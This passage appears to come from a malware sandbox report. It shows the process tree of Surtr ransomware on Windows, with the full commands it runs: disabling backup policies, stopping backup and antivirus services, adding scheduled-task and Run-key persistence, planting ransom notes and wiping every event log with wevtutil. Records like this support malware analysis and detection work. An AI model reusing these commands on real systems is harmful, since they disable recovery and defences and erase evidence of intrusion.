C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f4⤵PID:4072
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "AcronisAgent"3⤵PID:1528
-
C:\Windows\system32\net.exenet stop "AcronisAgent"4⤵PID:2360
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "AcronisAgent"5⤵PID:4020
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f3⤵PID:2684
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f4⤵PID:1480
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f3⤵PID:4536
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f4⤵PID:3184
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "AcrSch2Svc"3⤵PID:4248
-
C:\Windows\system32\net.exenet stop "AcrSch2Svc"4⤵PID:3424
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "AcrSch2Svc"5⤵PID:1148
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f3⤵PID:4652
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupUI /t REG_DWORD /d 1 /f4⤵PID:4312
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f3⤵PID:964
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableSystemBackupUI /t REG_DWORD /d 1 /f4⤵PID:4608
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Antivirus"3⤵PID:4048
-
C:\Windows\system32\net.exenet stop "Antivirus"4⤵PID:4032
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Antivirus"5⤵PID:2332
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f3⤵PID:1216
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v OnlySystemBackup /t REG_DWORD /d 1 /f4⤵PID:1688
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f3⤵PID:1648
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToDisk /t REG_DWORD /d 1 /f4⤵PID:2104
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "BackupExecAgentAccelerator"3⤵PID:4180
-
C:\Windows\system32\net.exenet stop "BackupExecAgentAccelerator"4⤵PID:4004
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "BackupExecAgentAccelerator"5⤵PID:692
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f3⤵PID:4268
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToNetwork /t REG_DWORD /d 1 /f4⤵PID:5076
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f3⤵PID:1484
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoBackupToOptical /t REG_DWORD /d 1 /f4⤵PID:2952
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "BackupExecAgentBrowser"3⤵PID:772
-
C:\Windows\system32\net.exenet stop "BackupExecAgentBrowser"4⤵PID:4632
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "BackupExecAgentBrowser"5⤵PID:4600
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f3⤵PID:5104
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f4⤵PID:5060
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f3⤵PID:904
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System\{9580d7dd-0379-4658-9870-d5be7d52d6de} /v Enable /t REG_DWORD /d 0 /f4⤵PID:1556
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "BackupExecDeviceMediaService"3⤵PID:5032
-
C:\Windows\system32\net.exenet stop "BackupExecDeviceMediaService"4⤵PID:4492
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "BackupExecDeviceMediaService"5⤵PID:4456
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c mkdir "C:\ProgramData\Service"3⤵PID:2776
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c mkdir "%TEMP%\Service"3⤵PID:416
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.hta" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.hta"3⤵
- Drops startup file
PID:932
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.txt" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.txt"3⤵PID:488
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "BackupExecJobEngine"3⤵PID:1268
-
C:\Windows\system32\net.exenet stop "BackupExecJobEngine"4⤵PID:1220
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "BackupExecJobEngine"5⤵PID:3124
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Surtr.exe" "%TEMP%\Service\Surtr.exe"3⤵PID:344
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "BackupExecManagementService"3⤵PID:2452
-
C:\Windows\system32\net.exenet stop "BackupExecManagementService"4⤵PID:4184
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "BackupExecManagementService"5⤵PID:4160
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Public_DATA.surt" "%TEMP%\Service\Public_DATA.surt"3⤵PID:4512
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Private_DATA.surt" "%TEMP%\Service\Private_DATA.surt"3⤵PID:4460
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "BackupExecRPCService"3⤵PID:5012
-
C:\Windows\system32\net.exenet stop "BackupExecRPCService"4⤵PID:4824
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "BackupExecRPCService"5⤵PID:5000
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\ID_DATA.surt" "%TEMP%\Service\ID_DATA.surt"3⤵PID:4580
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "BackupExecVSSProvider"3⤵PID:5112
-
C:\Windows\system32\net.exenet stop "BackupExecVSSProvider"4⤵PID:4772
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "BackupExecVSSProvider"5⤵PID:4940
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "EPSecurityService"3⤵PID:4840
-
C:\Windows\system32\net.exenet stop "EPSecurityService"4⤵PID:2552
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "EPSecurityService"5⤵PID:5088
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\SURTR_README.hta" "%TEMP%\Service\SURTR_README.hta"3⤵PID:852
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\SURTR_README.txt" "%TEMP%\Service\SURTR_README.txt"3⤵PID:1380
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "IISAdmin"3⤵PID:1036
-
C:\Windows\system32\net.exenet stop "IISAdmin"4⤵PID:1172
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "IISAdmin"5⤵PID:3664
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c attrib +R /S "C:\ProgramData\Service"3⤵PID:1356
-
C:\Windows\system32\attrib.exeattrib +R /S "C:\ProgramData\Service"4⤵
- Views/modifies file attributes
PID:4812
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "IMAP4Svc"3⤵PID:1816
-
C:\Windows\system32\net.exenet stop "IMAP4Svc"4⤵PID:2724
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "IMAP4Svc"5⤵PID:2140
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c attrib +R /S "%TEMP%\Service"3⤵PID:4900
-
C:\Windows\system32\attrib.exeattrib +R /S "C:\Users\Admin\AppData\Local\Temp\Service"4⤵
- Views/modifies file attributes
PID:264
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "macmnsvc"3⤵PID:2768
-
C:\Windows\system32\net.exenet stop "macmnsvc"4⤵PID:2100
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "macmnsvc"5⤵PID:1488
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN svchos1 /TR "C:\ProgramData\Service\Surtr.exe" /RU SYSTEM /RL HIGHEST /F3⤵PID:3496
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /TN svchos1 /TR "C:\ProgramData\Service\Surtr.exe" /RU SYSTEM /RL HIGHEST /F4⤵
- Creates scheduled task(s)
PID:1304
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "masvc"3⤵PID:984
-
C:\Windows\system32\net.exenet stop "masvc"4⤵PID:268
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "masvc"5⤵PID:4128
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN svchos2 /TR "C:\ProgramData\Service\Surtr.exe" /F3⤵PID:632
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /TN svchos2 /TR "C:\ProgramData\Service\Surtr.exe" /F4⤵
- Creates scheduled task(s)
PID:4872
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MBAMService"3⤵PID:4932
-
C:\Windows\system32\net.exenet stop "MBAMService"4⤵PID:4016
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MBAMService"5⤵PID:4936
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Surtr.exe" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe"3⤵PID:3724
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos1" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f3⤵PID:1752
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos1" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f4⤵PID:1464
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MBEndpointAgent"3⤵PID:1472
-
C:\Windows\system32\net.exenet stop "MBEndpointAgent"4⤵PID:2984
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos2" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f3⤵PID:2324
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos2" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f4⤵
- Adds Run key to start application
PID:4952
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos3" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f3⤵PID:4164
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos3" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f4⤵
- Adds Run key to start application
PID:4392
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "McAfeeEngineService"3⤵PID:4948
-
C:\Windows\system32\net.exenet stop "McAfeeEngineService"4⤵PID:1940
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfeeEngineService"5⤵PID:4080
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos4" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f3⤵PID:4296
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos4" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f4⤵PID:3620
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "McAfeeFramework"3⤵PID:4992
-
C:\Windows\system32\net.exenet stop "McAfeeFramework"4⤵PID:4040
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfeeFramework"5⤵PID:3444
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "%TEMP%\Service\Private_DATA.surt" "%USERPROFILE%\Desktop\Private_DATA.surt"3⤵PID:4468
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "McAfeeFrameworkMcAfeeFramework"3⤵PID:4968
-
C:\Windows\system32\net.exenet stop "McAfeeFrameworkMcAfeeFramework"4⤵PID:4416
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfeeFrameworkMcAfeeFramework"5⤵PID:4476
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "%TEMP%\Service\ID_DATA.surt" "%USERPROFILE%\Desktop\ID_DATA.surt"3⤵PID:3028
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "%TEMP%\Service\SURTR_README.hta" "%USERPROFILE%\Desktop\SURTR_README.hta"3⤵PID:4396
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy "%TEMP%\Service\Service\SURTR_README.txt" "%USERPROFILE%\Desktop\SURTR_README.txt"3⤵PID:3380
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "McShield"3⤵PID:4976
-
C:\Windows\system32\net.exenet stop "McShield"4⤵PID:4256
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McShield"5⤵PID:3864
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c for /F "tokens=*" %s in ('wevtutil.exe el') DO wevtutil.exe cl "%s"3⤵PID:1676
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wevtutil.exe el4⤵PID:3648
-
C:\Windows\system32\wevtutil.exewevtutil.exe el5⤵PID:3320
-
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "AirSpaceChannel"4⤵PID:4528
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Analytic"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2616
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Application"4⤵PID:3048
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "DirectShowFilterGraph"4⤵PID:4628
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "DirectShowPluginControl"4⤵PID:4608
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Els_Hyphenation/Analytic"4⤵PID:4548
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "EndpointMapper"4⤵PID:3860
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "FirstUXPerf-Analytic"4⤵PID:1780
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "ForwardedEvents"4⤵PID:4180
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "General Logging"4⤵PID:5056
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "HardwareEvents"4⤵PID:2320
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "IHM_DebugChannel"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:5092
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Intel-iaLPSS-GPIO/Analytic"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1608
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Intel-iaLPSS-I2C/Analytic"4⤵PID:1380
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Intel-iaLPSS2-GPIO2/Debug"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4812
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Intel-iaLPSS2-GPIO2/Performance"4⤵PID:4892
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Intel-iaLPSS2-I2C/Debug"4⤵PID:3240
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Intel-iaLPSS2-I2C/Performance"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:284
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Internet Explorer"4⤵PID:1488
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Key Management Service"4⤵PID:4868
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MF_MediaFoundationDeviceProxy"4⤵PID:3088
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MedaFoundationVideoProc"4⤵PID:3984
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MedaFoundationVideoProcD3D"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4080
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MediaFoundationAsyncWrapper"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4996
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MediaFoundationContentProtection"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4336
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MediaFoundationDS"4⤵PID:4352
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MediaFoundationDeviceProxy"4⤵PID:4112
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MediaFoundationMediaEngine"4⤵PID:3040
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MediaFoundationPerformance"4⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:4236
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MediaFoundationPerformanceCore"4⤵PID:4476
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MediaFoundationPipeline"4⤵PID:3792
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MediaFoundationPlatform"4⤵PID:2964
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "MediaFoundationSrcPrefetch"4⤵PID:2456
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-AppV-Client-Streamingux/Debug"4⤵PID:2224
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-AppV-Client/Admin"4⤵PID:3144
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-AppV-Client/Debug"4⤵PID:4756
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-AppV-Client/Operational"4⤵PID:5080
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-AppV-Client/Virtual Applications"4⤵PID:4860
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-AppV-SharedPerformance/Analytic"4⤵PID:5088
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Client-Licensing-Platform/Admin"4⤵PID:4128
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Client-Licensing-Platform/Debug"4⤵PID:4872
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Client-Licensing-Platform/Diagnostic"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4868
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-IE/Diagnostic"4⤵PID:1336
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-IEFRAME/Diagnostic"4⤵PID:920
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-JSDumpHeap/Diagnostic"4⤵PID:4164
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-OneCore-Setup/Analytic"4⤵PID:4960
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-PerfTrack-IEFRAME/Diagnostic"4⤵PID:4296
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-PerfTrack-MSHTML/Diagnostic"4⤵PID:4112
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-User Experience Virtualization-Admin/Debug"4⤵PID:636
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-User Experience Virtualization-Agent Driver/Debug"4⤵PID:4436
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-User Experience Virtualization-Agent Driver/Operational"4⤵PID:4464
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-User Experience Virtualization-App Agent/Analytic"4⤵PID:2104
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-User Experience Virtualization-App Agent/Debug"4⤵PID:692
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-User Experience Virtualization-App Agent/Operational"4⤵PID:508
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-User Experience Virtualization-IPC/Operational"4⤵PID:1716
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-User Experience Virtualization-SQM Uploader/Analytic"4⤵PID:5088
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-User Experience Virtualization-SQM Uploader/Debug"4⤵
- Clears Windows event logs
PID:4916
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-User Experience Virtualization-SQM Uploader/Operational"4⤵PID:1600
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AAD/Analytic"4⤵
- Clears Windows event logs
PID:3864
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AAD/Operational"4⤵PID:804
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ADSI/Debug"4⤵PID:1776
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ASN1/Operational"4⤵PID:1520
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ATAPort/General"4⤵PID:4552
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ATAPort/SATA-LPM"4⤵PID:1528
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-ActionQueue/Analytic"4⤵PID:4536
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-All-User-Install-Agent/Admin"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3048
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AllJoyn/Debug"4⤵PID:4488
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AllJoyn/Operational"4⤵PID:5020
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppHost/Admin"4⤵PID:3288
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppHost/ApplicationTracing"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4476
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppHost/Diagnostic"4⤵PID:4156
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppHost/Internal"4⤵PID:1472
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppID/Operational"4⤵PID:1936
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppLocker/EXE and DLL"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3040
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppLocker/MSI and Script"4⤵PID:4244
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppLocker/Packaged app-Deployment"4⤵PID:4480
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppLocker/Packaged app-Execution"4⤵PID:3768
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Admin"4⤵PID:3084
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Analytic"4⤵PID:2612
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Debug"4⤵PID:4372
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Diagnostics"4⤵PID:660
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppModel-State/Debug"4⤵PID:3484
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppModel-State/Diagnostic"4⤵PID:4508
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppReadiness/Admin"4⤵PID:4052
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppReadiness/Debug"4⤵
- Clears Windows event logs
PID:3772
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppReadiness/Operational"4⤵PID:2108
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppSruProv"4⤵PID:4980
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppXDeployment/Diagnostic"4⤵PID:1740
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppXDeployment/Operational"4⤵PID:976
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Debug"4⤵PID:1616
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Diagnostic"4⤵PID:2696
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Operational"4⤵PID:1612
-
-
